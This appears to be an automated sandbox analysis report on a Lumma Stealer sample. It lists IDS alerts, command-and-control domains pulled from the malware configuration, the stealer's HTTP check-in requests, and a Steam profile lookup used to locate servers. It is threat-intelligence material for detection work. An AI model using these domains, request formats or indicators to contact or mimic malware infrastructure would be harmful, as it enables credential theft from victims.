    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49774 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49774 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49780 -> 104.21.33.249:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49780 -> 104.21.33.249:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49819 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49819 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49837 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49837 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49790 -> 104.21.77.78:443
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49826 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49813 -> 104.21.79.35:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49813 -> 104.21.79.35:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49806 -> 172.67.173.224:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49806 -> 172.67.173.224:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49790 -> 104.21.77.78:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49799 -> 172.67.140.193:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49799 -> 172.67.140.193:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49843 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49843 -> 172.67.206.204:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: condifendteu.sbs
    Source: Malware configuration extractorURLs: allocatinow.sbs
    Source: Malware configuration extractorURLs: ehticsprocw.sbs
    Source: Malware configuration extractorURLs: vennurviot.sbs
    Source: Malware configuration extractorURLs: divewanntwj.biz
    Source: Malware configuration extractorURLs: drawwyobstacw.sbs
    Source: Malware configuration extractorURLs: enlargkiw.sbs
    Source: Malware configuration extractorURLs: resinedyw.sbs
    Source: Malware configuration extractorURLs: mathcucom.sbs
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 104.21.33.249 104.21.33.249
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: divewanntwj.biz
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=bxMlIAxRNFAWJgPn4rB1sAax3Kr_T1ZtpPoatisDzkE-1728776609-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: divewanntwj.biz
    Source: global trafficDNS traffic detected: DNS query: mathcucom.sbs
    Source: global trafficDNS traffic detected: DNS query: allocatinow.sbs
    Source: global trafficDNS traffic detected: DNS query: enlargkiw.sbs
    Source: global trafficDNS traffic detected: DNS query: resinedyw.sbs
    Source: global trafficDNS traffic detected: DNS query: vennurviot.sbs
    Source: global trafficDNS traffic detected: DNS query: ehticsprocw.sbs
    Source: global trafficDNS traffic detected: DNS query: condifendteu.sbs
    Source: global trafficDNS traffic detected: DNS query: drawwyobstacw.sbs
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: divewanntwj.biz
    Source: Setup.exe, program.js.0.drString found in binary or memory: http://json-schema.org/draft-07/schema
    Source: program.js.0.drString found in binary or memory: http://json-schema.org/draft-07/schema#
    Source: Setup.exe, program.js.0.drString found in binary or memory: http://json-schema.org/schema
    Source: Setup.exe, 00000000.00000002.2279698242.0000000003E1E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jsperf.com/1-vs-infinity
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/3l
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/api
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/api1
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/co
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/pi
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: Setup.exe, program.js.0.drString found in binary or memory: https://aws.amazon.com
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: BitLockerToGo.exe, 00000002.00000003.2297598155.00000000031AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://divewanntwj.biz/api
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/api
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/li3
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/
    Source: Setup.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii
    Source: Setup.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii.git
    Source: Setup.exe, program.js.0.drString found in binary or memory: https://github.com/aws/jsii/issues
    Source: program.js.0.drString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: Setup.exe, 00000000.00000002.2279698242.0000000003E1E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/object-keys-vs-for-in-with-closure/3
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297598155.00000000031AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/apij
    Source: program.js.0.drString found in binary or memory: https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/api
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs:443/apii
    Source: BitLockerToGo.exe, 00000002.00000002.2400111218.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: BitLockerToGo.exe, 00000002.00000002.2400111218.000000000319C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: BitLockerToGo.exe, 00000002.00000002.2400111218.000000000319C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiC
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49763 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49774 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.6:49780 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.6:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.6:49799 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.6:49806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.6:49813 version: TLS 1.2
